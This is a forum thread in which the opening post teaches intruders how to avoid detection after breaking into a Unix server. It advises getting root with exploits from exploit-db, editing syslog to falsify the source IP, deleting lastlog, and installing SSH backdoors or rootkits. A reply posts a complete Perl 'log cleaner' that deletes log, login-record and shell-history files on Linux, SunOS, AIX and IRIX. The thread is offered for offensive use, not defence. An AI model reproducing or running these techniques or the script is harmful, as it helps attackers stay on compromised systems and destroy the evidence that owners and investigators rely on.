Camping out on *Nix system's - System Security

chroniccommand

[Intro]
So, you've just broke into a server running any *nix system(FreeBSD, Ubuntu, SuSe etc...). What now? Well you fux shit up. But you don't wanna get caught right? Well *Nix systems are quite secure, but you can still not get caught. In this brief guide I'll be showing you where log files are stored, what to do with them etc.

[Basics]
So there are many ways to break into a box. Let's say you SSH into a system and type

uname -a

And get something like

Linux ubuntu 2.6.32-26-generic #48-Ubuntu SMP Wed Nov 24 10:14:11 UTC 2010 x86_64 GNU/Linux

Now you can not be a skid and write your own exploit, or you can search for one. Considering most people can't write one(not even me most of the time), you'll need to search http://exploit-db.com/
Just find an exploit and try to run it to gain r00t. But that's just the very basics(And this isn't much of a guide on breaking into systems.

[Logs]
Just about all systems keep logs. Boot logs, user logs, program logs, debug logs etc etc. To get a look at what these logs look like, you can navigate to the log file location to see them.


cd /var/log
ls

This will list all logs in /var/log, the usual log location. Let's say we wanna view the first 5 lines of kern.log, the kernel log(obviously).


head --lines=5 kern&#46;log

output:


Dec 19 00&#58;45&#58;47 ubuntu kernel&#58; Kernel logging (proc) stopped&#46;
Dec 19 14&#58;04&#58;37 ubuntu kernel&#58; imklog 4&#46;2&#46;0, log source = /proc/kmsg started&#46;
Dec 19 14&#58;04&#58;37 ubuntu kernel&#58; &#91;    0&#46;000000&#93; Initializing cgroup subsys cpuset
Dec 19 14&#58;04&#58;37 ubuntu kernel&#58; &#91;    0&#46;000000&#93; Initializing cgroup subsys cpu
Dec 19 14&#58;04&#58;37 ubuntu kernel&#58; &#91;    0&#46;000000&#93; Linux version 2&#46;6&#46;32-26-generic (buildd@allspice) (gcc version 4&#46;4&#46;3 (Ubuntu 4&#46;4&#46;3-4ubuntu5) ) #48-Ubuntu SMP Wed Nov 24 10&#58;14&#58;11 UTC 2010 (Ubuntu 2&#46;6&#46;32-26&#46;48-generic 2&#46;6&#46;32&#46;24+drm33&#46;11)

That is the first 5 lines of kern.log. kern.log is much bigger, but for the guide's sake we'll see the first 5 lines. Anyways, /var/log houses quite a bit of logs as you can see with a simple ls. A system administrator can easily view these logs to see if there's any intrusions. This is bad for a hacker. We don't want to be caught... Well usually. So how do we not get caught?

[Log manipulation]
Do we delete the logs? Well we could. But this is quite suspicious. What would you think if all the sudden you go to your computer, check your logs and boom, they're gone. You'd know shit's up and investigate it. So what else can we do to not get caught. Edit the log's obviously. All you need to do is type the following:

nano /var/log/syslog&#46;1

You must run this as root or you'll only have read only permissions(Unless the admin was retarded enough to CHMOD the logs so anybody can edit them. In that case, the admin deserves to be hacked). But if we exploited the system, we should have root so no problemo. Now you can edit the logs to your pleasing. It's a good idea to edit them so it looks like the connection came from a different IP instead of yours, etc. But theres a small issue. There's a log called /var/log/lastlog. It's not a text file so you can't edit it. It's executable so you type in /var/log/lastlog and it shows where the last users logged in from. Since you can't really edit it, you could delete it. Other than that I don't know any other alternatives to dealing with that problem.

[Hiding out]
Theres more to just deleting log files. For example, we should check to see the CPU info. To do this, cd to /proc. From here,


cat cpuinfo

This will list all info on the CPU. From here you can see they're on a VM(Virtual Machine). And what if we do break in? We want to easily get BACK in right? Easy, just use a backdoor // rootkit. No, I'm not talking about a RAT. Try searching for things such as SSH backdoors. These suckers can be very useful to you :)

That's all for now.

--Chroniccommand

Sh3llc0d3

This may come in handy as a reference. I'm learning to code exploits so I won't be using exploit db's for much longer hopefully.

chroniccommand

said:

This may come in handy as a reference. I'm learning to code exploits so I won't be using exploit db's for much longer hopefully.

Exploit-db is good none the less. Why write a 500 line exploit for lets say, an SMB protocol if there's already one out there.

Bursihido

Thanks again great tutorial.

Sh3llc0d3

said:

said:

This may come in handy as a reference. I'm learning to code exploits so I won't be using exploit db's for much longer hopefully.

Exploit-db is good none the less. Why write a 500 line exploit for lets say, an SMB protocol if there's already one out there.

Because it gives me the satisfaction of knowing I did it alone and can't be called a variety of names that other so called 'hackers' decide to call people these days.

chroniccommand

said:

said:

said:

This may come in handy as a reference. I'm learning to code exploits so I won't be using exploit db's for much longer hopefully.

Exploit-db is good none the less. Why write a 500 line exploit for lets say, an SMB protocol if there's already one out there.

Because it gives me the satisfaction of knowing I did it alone and can't be called a variety of names that other so called 'hackers' decide to call people these days.

True. But it's not always about taking the hard way. Coding your own exploits is best for if you discover a new vuln. Then you get the satisfaction of knowing you created a new one.

Xin

Great paper Chronic, im a Debian fanboy myself is the log files still in var/log in other things like Centos?

chroniccommand

said:

Great paper Chronic, im a Debian fanboy myself is the log files still in var/log in other things like Centos?

Well they should be. If not try looking at a GUI log viewer and finding the log file location. Or do a quick google search.

Sh3llc0d3

If you want something to help with logs check this out:

#!usr/bin/perl -w #Warnings enabled! 
#Log cleaner version Public 
#Give Credits Where Needed - Kouros! 
#This took time, Hope you fucking use it &#58;D 
#Report bugs to info@Kouros-bl4ckhat&#46;com 
#NOTE - YOU MUST BE ROOT! 
print qq^ 
############################ 
#  Log Cleaner 3&#46;0 PUBLIC              # 
#                  Kouros                            # 
#                                                          # 
#  Virangar Security Team              # 
# http&#58;//www&#46;Kouros-bl4ckhat&#46;com   # 
############################ 
^; 
while(1) { 
  print \"Enter Which OS&#58; \"; #User Input 
  chomp($os = &lt;STDIN&gt;); #Takes it into memory 
    
                
          if($os eq \"help\"){ 
          print \"&#91;+&#93;Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n\"; 
          print \"&#91;+&#93;Hit enter with OS, Let the script do its work\n\"; 
          print \"&#91;+&#93;Note&#58; You MUST Be Root!\n\"; 
          print \"&#91;+&#93;Contact Info&#91;at&#93;Kouros-bl4ckhat &#91;dot&#93; Com\"; 
          print \"&#91;+&#93;For Bug finds&#46;&#46;&#46; Have Fun!\n\"; 
          print \"&#91;+&#93; - Kouros\"; 
          }          
            
             if($os eq \"linux\"){ #If linux typed, do the following and start brackets 
      foreach my $logphile(@linux) { 
                   unlink($logphile) || print \"&#91;-&#93;Fucked up&#58; \\"$logphile\\" &#58; $!\n\"; 
             } 
             } elsif($os eq \"sunos\"){ #If sunos typed, do the following and start brackets 
           foreach my $logphile(@sunos) { 
                    unlink($logphile) || print \"&#91;-&#93; Fucked up&#58; \\"$logphile\\" &#58; $!\n\"; 
              } 
              } elsif($os eq \"aix\"){ #If aix typed, do the following and start brackets 
           foreach my $logphile(@aix) { 
         unlink($logphile) || print \"&#91;-&#93; Fucked up&#58; \\"$logphile\\" &#58; $!\n\"; 
              } 
              } elsif($os eq \"irix\"){ #If irix typed, do the following and start bracket 
            foreach my $logphile(@irix) { 
                    unlink($logphile) || print \"&#91;-&#93; Fucked up&#58; \\"$logphile\\" &#58; $!\n\"; 
              } 

              } else { print\"Umm WTF !?\n\"; } 
          
          
            
                              #Logs of Irix Systems 

   { #Start Irix Bracket 
    @irix = (\"/var/adm/SYSLOG\", \"/var/adm/sulog\", \"/var/adm/utmp\", \"/var/adm/utmpx\", 
           \"/var/adm/wtmp\", \"/var/adm/wtmpx\", \"/var/adm/lastlog/\", 
         \"/usr/spool/lp/log\", \"/var/adm/lp/lp-errs\", \"/usr/lib/cron/log\", 
         \"/var/adm/loginlog\", \"/var/adm/pacct\", \"/var/adm/dtmp\", 
         \"/var/adm/acct/sum/loginlog\", \"var/adm/X0msgs\", \"/var/adm/crash/vmcore\", 
         \"/var/adm/crash/unix\") #End Array 
        } #End Irix Bracket 
                             #Log sof Aix Systems 
   {   #Start Aix Bracket 
   @aix = (\"/var/adm/pacct\", \"/var/adm/wtmp\", \"/var/adm/dtmp\", \"/var/adm/qacct\",    
            \"/var/adm/sulog\", \"/var/adm/ras/errlog\", \"/var/adm/ras/bootlog\", 
            \"/var/adm/cron/log\", \"/etc/utmp\", \"/etc/security/lastlog\", 
            \"/etc/security/failedlogin\", \"usr/spool/mqueue/syslog\")   #End Array    
      }   #End Aix Bracket 
                             #Logs of SunOS Systems    
   {   #Start SunOS Bracket                      
   @sunos = (\"/var/adm/messages\", \"/var/adm/aculogs\", \"/var/adm/aculog\", 
              \"/var/adm/sulog\", \"/var/adm/vold&#46;log\", \"/var/adm/wtmp\", 
              \"/var/adm/wtmpx\", \"/var/adm/utmp\", \"/var/adm/utmpx\", 
              \"/var/adm/log/asppp&#46;log\", \"/var/log/syslog\", 
              \"/var/log/POPlog\", \"/var/log/authlog\", \"/var/adm/pacct\", 
              \"/var/lp/logs/lpsched\", \"/var/lp/logs/requests\", 
           \"/var/cron/logs\", \"/var/saf/_log\", \"/var/saf/port/log\") #End Array 
      } #End Sunos bracket    
                             #Logs of Linux Systems      
   {   #Start Linux Bracket    
    @linux = (\"/var/log/lastlog\", \"/var/log/telnetd\", \"/var/run/utmp\", 
              \"/var/log/secure\",\"/root/&#46;ksh_history\", \"/root/&#46;bash_history\", 
              \"/root/&#46;bash_logut\", \"/var/log/wtmp\", \"/etc/wtmp\", 
              \"/var/run/utmp\", \"/etc/utmp\", \"/var/log\", \"/var/adm\", 
              \"/var/apache/log\", \"/var/apache/logs\", \"/usr/local/apache/logs\", 
              \"/usr/local/apache/logs\", \"/var/log/acct\", \"/var/log/xferlog\", 
              \"/var/log/messages/\", \"/var/log/proftpd/xferlog&#46;legacy\", 
              \"/var/log/proftpd&#46;xferlog\", \"/var/log/proftpd&#46;access_log\", 
              \"/var/log/httpd/error_log\", \"/var/log/httpsd/ssl_log\", 
              \"/var/log/httpsd/ssl&#46;access_log\", \"/etc/mail/access\", 
              \"/var/log/qmail\", \"/var/log/smtpd\", \"/var/log/samba\", 
              \"/var/log/samba&#46;log&#46;%m\", \"/var/lock/samba\", \"/root/&#46;Xauthority\", 
              \"/var/log/poplog\", \"/var/log/news&#46;all\", \"/var/log/spooler\", 
              \"/var/log/news\", \"/var/log/news/news\", \"/var/log/news/news&#46;all\", 
              \"/var/log/news/news&#46;crit\", \"/var/log/news/news&#46;err\", \"/var/log/news/news&#46;notice\", 
              \"/var/log/news/suck&#46;err\", \"/var/log/news/suck&#46;notice\", 
              \"/var/spool/tmp\", \"/var/spool/errors\", \"/var/spool/logs\", \"/var/spool/locks\", 
              \"/usr/local/www/logs/thttpd_log\", \"/var/log/thttpd_log\", 
              \"/var/log/ncftpd/misclog&#46;txt\", \"/var/log/nctfpd&#46;errs\", 
              \"/var/log/auth\") #End array 
      } #End linux bracket 
      
   } #Ends Loop

Howdy, Stranger!

Top Posters

Who's Online (1)